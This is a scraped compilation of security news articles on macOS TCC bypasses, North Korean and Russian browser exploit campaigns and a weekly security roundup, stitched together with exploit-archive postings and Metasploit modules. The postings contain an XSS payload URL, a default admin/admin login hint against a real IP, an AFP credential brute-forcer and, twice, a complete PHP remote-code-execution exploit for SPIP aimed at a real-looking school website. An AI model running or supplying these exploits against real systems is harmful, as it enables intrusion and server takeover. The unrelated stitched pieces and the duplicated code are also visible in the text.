Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.
"If successful, the adversary could gain any privileges already granted to the affected

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.

"If successful, the adversary could gain any privileges already granted to the affected Microsoft applications," Cisco Talos said. "For example, the attacker could send emails from the user account without the user noticing, record audio clips, take pictures, or record videos without any user interaction."

The shortcomings span various applications such as Outlook, Teams, Word, Excel PowerPoint, and OneNote.

The cybersecurity company said malicious libraries could be injected into these applications and gain their entitlements and user-granted permissions, which could then be weaponized for extracting sensitive information depending on the access granted to each of those apps.

TCC is a framework developed by Apple to manage access to sensitive user data on macOS, giving users added transparency into how their data is accessed and used by different applications installed on the machine.

This is maintained in the form of an encrypted database that records the permissions granted by the user to each application so as to ensure that the preferences are consistently enforced across the system.

"TCC works in conjunction with the application sandboxing feature in macOS and iOS," Huntress notes in its explainer for TCC. "Sandboxing restricts an app's access to the system and other applications, adding an extra layer of security. TCC ensures that apps can only access data for which they have received explicit user consent."

Sandboxing is also a countermeasure that guards against code injection, which enables attackers with access to a machine to insert malicious code into legitimate processes and access protected data.

"Library injection, also known as Dylib Hijacking in the context of macOS, is a technique whereby code is inserted into the running process of an application," Talos researcher Francesco Benvenuto said. "macOS counters this threat with features such as hardened runtime, which reduce the likelihood of an attacker executing arbitrary code through the process of another app."

"However, should an attacker manage to inject a library into the process space of a running application, that library could use all the permissions already granted to the process, effectively operating on behalf of the application itself."

It however bears noting that attacks of this kind require the threat actor to already have a certain level of access to the compromised host so that it could be abused to open a more privileged app and inject a malicious library, essentially granting them the permissions associated with the exploited app.

In other words, should a trusted application be infiltrated by an attacker, it could be leveraged to abuse its permissions and gain unwarranted access to sensitive information without users' consent or knowledge.

This sort of breach could occur when an application loads libraries from locations the attacker could potentially manipulate and it has disabled library validation through a risky entitlement (i.e., set to true), which otherwise limits the loading of libraries to those signed by the application's developer or Apple.

"macOS trusts applications to self-police their permissions," Benvenuto noted. "A failure in this responsibility leads to a breach of the entire permission model, with applications inadvertently acting as proxies for unauthorized actions, circumventing TCC and compromising the system's security model."

Microsoft, for its part, considers the identified issues as "low risk" and that the apps are required to load unsigned libraries to support plugins. However, the company has stepped in to remediate the problem in its OneNote and Teams apps.

"The vulnerable apps leave the door open for adversaries to exploit all of the apps' entitlements and, without any user prompts, reuse all the permissions already granted to the app, effectively serving as a permission broker for the attacker," Benvenuto said.

"It's also important to mention that it's unclear how to securely handle such plug-ins within macOS' current framework. Notarization of third-party plug-ins is an option, albeit a complex one, and it would require Microsoft or Apple to sign third-party modules after verifying their security."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Flaws in Microsoft macOS Apps Could Allow Hackers to Gain Unrestricted Access

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

SPIP version 4.2.7 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.7 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.7 Code Execution

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

This Metasploit module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Remote::AFP  def initialize(info={})    super(update_info(info,      'Name'         => 'Apple Filing Protocol Info Enumerator',      'Description'  => %q{        This module fetches AFP server information, including server name,        network address, supported AFP versions, signature, machine type,        and server flags.      },      'References'     =>        [          [ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]        ],      'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],      'License'      => MSF_LICENSE    ))  end  def run_host(ip)    print_status("AFP #{ip} Scanning...")    begin      connect      response = get_info      report(response)    rescue ::Timeout::Error    rescue ::Interrupt      raise $!    rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT    rescue ::Exception      raise $!      print_error("AFP #{rhost}:#{rport} #{$!.class} #{$!}")    ensure      disconnect    end  end  def report(response)    report_info = "AFP #{rhost}:#{rport} Server Name: #{response[:server_name]} \n" +    "AFP #{rhost}:#{rport}  Server Flags: \n" +    format_flags_report(response[:server_flags]) +    "AFP #{rhost}:#{rport}  Machine Type: #{response[:machine_type]} \n" +    "AFP #{rhost}:#{rport}  AFP Versions: #{response[:versions].join(', ')} \n" +    "AFP #{rhost}:#{rport}  UAMs: #{response[:uams].join(', ')}\n" +    "AFP #{rhost}:#{rport}  Server Signature: #{response[:signature]}\n" +    "AFP #{rhost}:#{rport}  Server Network Address: \n" +    format_addresses_report(response[:network_addresses]) +    "AFP #{rhost}:#{rport}   UTF8 Server Name: #{response[:utf8_server_name]}"    lines = "AFP #{rhost}:#{rport}:#{rport} AFP:\n#{report_info}"    lines.split(/\n/).each do |line|      print_status(line)    end    report_note(:host => datastore['RHOST'],      :proto => 'tcp',      :port => datastore['RPORT'],      :type => 'afp_server_info',      :data => response)      report_service(        :host => datastore['RHOST'],        :port => datastore['RPORT'],        :proto => 'tcp',        :name => "afp",        :info => "AFP name: #{response[:utf8_server_name]}, Versions: #{response[:versions].join(', ')}"      )  end  def format_flags_report(parsed_flags)    report = ''    parsed_flags.each do |flag, val|      report << "AFP #{rhost}:#{rport}     *  #{flag}: #{val.to_s} \n"    end    return report  end  def format_addresses_report(parsed_network_addresses)    report = ''    parsed_network_addresses.each do |val|      report << "AFP #{rhost}:#{rport}     *  #{val.to_s} \n"    end    return report  endend

Apple Filing Protocol Info Enumerator

This Metasploit module attempts to bruteforce authentication credentials for AFP.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'openssl'require 'metasploit/framework/credential_collection'require 'metasploit/framework/login_scanner/afp'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::AuthBrute  include Msf::Exploit::Remote::AFP  def initialize(info={})    super(update_info(info,      'Name'         => 'Apple Filing Protocol Login Utility',      'Description'  => %q{        This module attempts to bruteforce authentication credentials for AFP.      },      'References'     =>        [          [ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],          [ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]        ],      'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],      'License'      => MSF_LICENSE    ))    register_options(      [        Opt::Proxies,        OptInt.new('LoginTimeOut', [ true, "Timeout on login", 23 ]),        OptBool.new('RECORD_GUEST', [ false, "Record guest login to the database", false]),        OptBool.new('CHECK_GUEST', [ false, "Check for guest login", true])      ], self)  end  def run_host(ip)    print_status("Scanning IP: #{ip.to_s}")    cred_collection = build_credential_collection(        username: datastore['USERNAME'],        password: datastore['PASSWORD'],    )    scanner = Metasploit::Framework::LoginScanner::AFP.new(      configure_login_scanner(        host: ip,        port: rport,        proxies: datastore['PROXIES'],        cred_details: cred_collection,        stop_on_success: datastore['STOP_ON_SUCCESS'],        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],        connection_timeout: 30,        max_send_size: datastore['TCP::max_send_size'],        send_delay: datastore['TCP::send_delay'],        framework: framework,        framework_module: self,        ssl: datastore['SSL'],        ssl_version: datastore['SSLVersion'],        ssl_verify_mode: datastore['SSLVerifyMode'],        ssl_cipher: datastore['SSLCipher'],        local_port: datastore['CPORT'],        local_host: datastore['CHOST']      )    )    scanner.scan! do |result|      credential_data = result.to_h      credential_data.merge!(          module_fullname: self.fullname,          workspace_id: myworkspace_id      )      if result.success?        credential_core = create_credential(credential_data)        credential_data[:core] = credential_core        create_credential_login(credential_data)        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"      else        invalidate_login(credential_data)        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"      end    end  endend

Apple Filing Protocol Login Utility

A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.
The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Rootkit / Threat Intelligence

A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.

The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. It's assessed to be a sub-cluster within the Lazarus Group (aka Diamond Sleet and Hidden Cobra).

It's worth mentioning that the use of the AppleJeus malware has been previously also attributed by Kaspersky to another Lazarus subgroup called BlueNoroff (aka APT38, Nickel Gladstone, and Stardust Chollima), indicative of the infrastructure and toolset sharing between these threat actors.

"Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain," the Microsoft Threat Intelligence team said.

"As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it."

The attack chains typically involve setting up fake websites masquerading as legitimate cryptocurrency trading platforms that seek to trick users into installing weaponized cryptocurrency wallets or trading applications that facilitate the theft of digital assets.

The observed zero-day exploit attack by Citrine Sleet involved the exploitation of CVE-2024-7971, a high-severity type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow threat actors to gain remote code execution (RCE) in the sandboxed Chromium renderer process. It was patched by Google as part of updates released last week.

As previously stated by The Hacker News, CVE-2024-7971 is the third actively exploited type confusion bug in V8 that Google resolved this year after CVE-2024-4947 and CVE-2024-5274.

It's currently not clear how widespread these attacks were or who was targeted, but the victims are said to have been directed to a malicious website named voyagorclub\[.\]space likely through social engineering techniques, thereby triggering an exploit for CVE-2024-7971.

The RCE exploit, for its part, paves the way for the retrieval of shellcode containing a Windows sandbox escape exploit (CVE-2024-38106) and the FudModule rootkit, which is used to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform \[direct kernel object manipulation\]."

CVE-2024-38106, a Windows kernel privilege escalation bug, is one of the six actively exploited security flaws that Microsoft remediated as part of its August 2024 Patch Tuesday update. That said, the Citrine Sleet-linked exploitation of the flaw has been found to have occurred after the fix was released.

"This may suggest a 'bug collision,' where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors," Microsoft said.

CVE-2024-7971 is also the third vulnerability that North Korean threat actors have leveraged this year to drop the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193, both of which are privilege escalation flaws in the built-in Windows drivers and were fixed by Microsoft in February and August.

"The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106," the company said.

"Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit

Plus: China-linked hackers infiltrate US internet providers, authorities crack down on a major piracy operation, and a ransomware gang claims attacks during the Paris Olympics.

Pavel Durov, the founder and CEO of the communication app Telegram, was arrested in France on Saturday as part of an investigation into his and Telegram’s alleged failure to moderate illegal content on the platform, among other allegations. After being detained for four days, he was charged on Wednesday evening, barred from leaving France, and released on the condition of posting a €5 million ($5.5 million) bail and reporting to a French police station twice a week. The Paris prosecutor's office said on Wednesday that Durov faces complicity charges related to child sexual abuse material and drug trafficking, as well charges for importing cryptology without prior declaration, and a “near-total absence” of cooperation with French authorities.

“Nudify” deepfake websites that generate images of people's naked bodies without their consent have been incorporating mainstream single sign-on authentication systems into their websites, a WIRED investigation found. Discord and Apple are terminating some developers’ accounts over this usage.

Microsoft published research on Wednesday about a new multistage backdoor that the notorious Iranian hacking group APT 33 or Peach Sandstorm has been using to target victims in sectors including satellite, communications equipment, and oil and gas. And Google researchers found that suspected Russian hackers compromised Mongolian government websites between November 2023 and July 2024 and then infected vulnerable users who visited the sites with malware. Crucially, the attackers compromised targets using exploits that were identical or very similar to hacking tools created by the commercial spyware vendors NSO Group and Intellexa.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**CIA Says It Provided Key Intelligence to Thwart Terrorist Plot Against Vienna Taylor Swift Concert**

The US Central Intelligence Agency provided Austrian law enforcement with crucial intelligence that led to the arrest of suspects who were allegedly plotting to attack Taylor Swift concerts in Austria at the beginning of the month. All three of the singer's planned concerts were canceled at Vienna’s Ernst Happel Stadium because of the threat. CIA deputy director David Cohen said at the Insa intelligence conference on Wednesday, “Within my agency and others there were people who thought that was a really good day for Langley and not just the Swifties in my workforce.”

The central suspect is a 19-year-old Austrian of North Macedonian background who reportedly made a full confession. Austrian law enforcement also arrested an 18-year-old and a 17-year-old in relation to the plot. Cops also reportedly interrogated a 15-year-old. The plot was allegedly inspired by the Islamic State and included plans to attack fans outside the venue with knives or explosives. Earlier this month, Austrian interior minister Gerhard Karner said foreign intelligence agencies contributed to the investigation because Austrian law bars text message surveillance.

“They were plotting to kill a huge number, tens of thousands of people at this concert, including I am sure many Americans, and were quite advanced in this,” the CIA's Cohen said at the conference. “The Austrians were able to make those arrests because the agency and our partners in the intelligence community provided them information about what this ISIS-connected group was planning to do.”

**Hackers Are Compromising ISPs With Credential-Stealing Malware**

Hackers who may be backed by the Chinese government have been exploiting a recently patched vulnerability in network management virtualization software known as Versa Director to compromise at least four US-based internet service providers and steal authentication credentials used by their customers. Researchers from Lumen's Black Lotus Labs, said on Thursday that the attacks began as early as June 12 and are likely still going on. Hackers exploit the Versa Director vulnerability to install remote access malware that Lumen dubbed allow “VersaMem.”

“Given the severity of the vulnerability, the implications of compromised Versa Director systems, and the time that has now elapsed to allow Versa customers to patch the vulnerability, Black Lotus Labs felt it was appropriate to release this information at this time,” the researchers wrote in a blog post. “Lumen Technologies shared threat intelligence to warn appropriate US government agencies of the emerging risks that could impact our nation’s strategic assets.”

**Vietnamese Law Enforcement Takedown “Fmovies” Piracy Ring**

The movie studio coalition known as the Alliance for Creativity and Entertainment said on Thursday that Hanoi police have investigated and taken down the Vietnam-based pirate streaming service Fmovies and its affiliates. The working group said it collaborated with law enforcement and provided information about Fmovies, which it called “the largest pirate streaming operation in the world.” The group added that Fmovies and its affiliate sites—which included bflixz, flixtorz, movies7, myflixer, and aniwave—had more than 6.7 billion visits between January 2023 and June 2024. The law enforcement operation also led to the takedown of video hosting provider Vidsrc.to and its affiliates because these services were allegedly “operated by the same suspects.” Hanoi police have arrested two men in connection with the case.

**Brain Cipher Ransomware Gang Claims Attacks During the Olympics**

Following a digital attack against dozens of French museums during the Olympic Games earlier this month, the ransomware gang known as Brain Cipher has claimed responsibility for the hacks and is threatening to leak 300 GB of stolen data from the museums. Le Grand Palais and dozens of other French national museums and cultural organizations are overseen by Réunion des Musées Nationaux – Grand Palais and reportedly all use some shared digital infrastructure, which the attackers targeted.

Taylor Swift Concert Terror Plot Was Thwarted by Key CIA Tip

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.
"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement

Browser Security / Vulnerability

Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.

"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement Lecigne said in a report shared with The Hacker News.

The activity, observed between November 2023 and July 2024, is notable for delivering the exploits by means of a watering hole attack on Mongolian government websites, cabinet.gov\[.\]mn and mfa.gov\[.\]mn.

The intrusion set has been attributed with moderate confidence to a Russian state-backed threat actor codenamed APT29 (aka Midnight Blizzard), with parallels observed between the exploits used in the campaigns and those previously linked to commercial surveillance vendors (CSVs) Intellexa and NSO Group, indicating exploit reuse.

The vulnerabilities at the center of the campaigns are listed below -

*   **CVE-2023-41993** - A WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (Fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

*   **CVE-2024-4671** - A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

*   **CVE-2024-5274** - A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

The November 2023 and February 2024 campaigns are said to have involved the compromises of the two Mongolian government websites – both in the first and only mfa.gov\[.\]mn in the latter – to deliver an exploit for CVE-2023-41993 by means of a malicious iframe component pointing to an actor-controlled domain.

"When visited with an iPhone or iPad device, the watering hole sites used an iframe to serve a reconnaissance payload, which performed validation checks before ultimately downloading and deploying another payload with the WebKit exploit to exfiltrate browser cookies from the device," Google said.

The payload is a cookie stealer framework that Google TAG previously detailed in connection with the 2021 exploitation of an iOS zero-day (CVE-2021-1879) to harvest authentication cookies from several popular websites, including Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and send them via WebSocket to an attacker-controlled IP address.

"The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated," Google noted at the time, adding "attackers used LinkedIn messaging to target government officials from western European countries by sending them malicious links."

The fact that the cookie stealer module also singles out the website "webmail.mfa.gov\[.\]mn" suggests that Mongolian government employees were a likely target of the iOS campaign.

The mfa.gov\[.\]mn website was infected a third time in July 2024 to inject JavScript code that redirected Android users using Chrome to a malicious link that served an exploit chain combining the flaws CVE-2024-5274 and CVE-2024-4671 to deploy a browser information stealing payload.

In particular, the attack sequence uses CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to achieve a sandbox escape vulnerability, ultimately making it possible to break out of Chrome site isolation protections and deliver a stealer malware.

"This campaign delivers a simple binary deleting all Chrome Crash reports and exfiltrating the following Chrome databases back to the track-adv\[.\]com server – similar to the basic final payload seen in the earlier iOS campaigns," Google TAG noted.

The tech giant further said the exploits used in the November 2023 watering hole attack and by Intellexa in September 2023 share the same trigger code, a pattern also observed in the triggers for CVE-2024-5274 used in the July 2024 watering hole attack and by NSO Group in May 2024.

